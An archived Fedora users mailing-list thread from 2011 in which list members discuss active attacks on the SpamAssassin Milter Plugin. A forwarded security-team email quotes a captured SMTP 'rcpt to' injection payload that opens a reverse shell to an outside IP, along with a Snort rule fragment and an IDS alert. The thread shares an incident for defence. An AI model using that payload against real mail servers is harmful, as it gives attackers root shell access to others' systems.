FAQ Search Today's Posts Mark Forums Read
» Video Reviews

» Linux Archive

Linux-archive is a website aiming to archive linux email lists and to make them easily accessible for linux users/developers.


» Sponsor

» Partners

» Sponsor

Go Back   Linux Archive > Redhat > Fedora User

 
 
LinkBack Thread Tools
 
Old 02-10-2011, 08:06 PM
jdow
 
Default No need for AV tools on Linux, eh?

For all of you with your touching faith that Linux is invulnerable I
offer up this message from the Spam Assassin list. This is an exploit
into a piece of software running with root privileges - in your email
system.

{^_-}

-------- Original Message --------
Subject: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt
Date: Thu, 10 Feb 2011 12:42:40 -0500
From: Michael Scheidell



heads up:

if case you are using spamassassin milter:

active exploits going on.

<http://seclists.org/fulldisclosure/2010/Mar/140>
<http://www.securityfocus.com/bid/38578>

Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


-------- Original Message --------
Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt











The rule is only looking for this:

content:"to|3A|"; depth:10; nocase; content:"+|3A|"|7C|";

Personally, I would probably block it. Although, if we’re not seeing this
sort of thing pop up on customer’s boxes, a manual block in scanner2 is
sufficient for now, right?

Either way, let me know and I’ll block/unblock/leave alone.

--

John Meyer

Associate Security Engineer

>|SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*Michael Scheidell
*Sent:* Thursday, February 10, 2011 12:25 PM
*To:* John Meyer
*Cc:* Jonathan Scheidell; Anthony Wetula
*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter
Plugin Remote Arbitrary Command Injection Attempt

is the snort rule specific enough that you can block the offending ip for 5
mins?

(if its a real smtp server, it will retry) and legit email through.



On 2/10/11 12:12 PM, John Meyer wrote:

I don’t like the looks of this. I blocked that IP with samtool.

Payload:

rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"

data

.

quit

--

John Meyer

Associate Security Engineer

>|SECNAP Network Security

Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*SECNAP Network Security
*Sent:* Thursday, February 10, 2011 12:01 PM
*To:* security-alert@scanner2.secnap.com
*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin
Remote Arbitrary Command Injection Attempt

02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote
Arbitrary Command Injection Attempt
[Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
>*| *SECNAP Network Security Corporation

·Certified SNORT Integrator

·2008-9 Hot Company Award Winner, World Executive Alliance

·Five-Star Partner Program 2009, VARBusiness

·Best in Email Security,2010: Network Products Guide

·King of Spam Filters, SC Magazine 2008


----------------------------------------------------------------------------

This email has been scanned and certified safe by SpammerTrap®.
For Information please see http://www.secnap.com/products/spammertrap/

----------------------------------------------------------------------------

--
users mailing list
users@lists.fedoraproject.org
To unsubscribe or change subscription options:
https://admin.fedoraproject.org/mailman/listinfo/users
Guidelines: http://fedoraproject.org/wiki/Mailing_list_guidelines
 
Old 02-10-2011, 08:18 PM
Michael Cronenworth
 
Default No need for AV tools on Linux, eh?

jdow wrote:
> For all of you with your touching faith that Linux is invulnerable I
> offer up this message from the Spam Assassin list. This is an exploit
> into a piece of software running with root privileges - in your email
> system.

I tried real hard to perform this exploit on my postfix/spamassassin F14
server, but the exploit did not work.

Try again.
--
users mailing list
users@lists.fedoraproject.org
To unsubscribe or change subscription options:
https://admin.fedoraproject.org/mailman/listinfo/users
Guidelines: http://fedoraproject.org/wiki/Mailing_list_guidelines
 
Old 02-10-2011, 08:30 PM
Joe Zeff
 
Default No need for AV tools on Linux, eh?

On 02/10/2011 01:06 PM, jdow wrote:
> For all of you with your touching faith that Linux is invulnerable I
> offer up this message from the Spam Assassin list. This is an exploit
> into a piece of software running with root privileges - in your email
> system.

Is this a "proof of concept," or is it actually in the wild? I also
note that it isn't listed as affecting Fedora 14.
--
users mailing list
users@lists.fedoraproject.org
To unsubscribe or change subscription options:
https://admin.fedoraproject.org/mailman/listinfo/users
Guidelines: http://fedoraproject.org/wiki/Mailing_list_guidelines
 

Thread Tools




All times are GMT. The time now is 04:23 AM.

VBulletin, Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO ©2007, Crawlability, Inc.
Copyright 2007 - 2008, www.linux-archive.org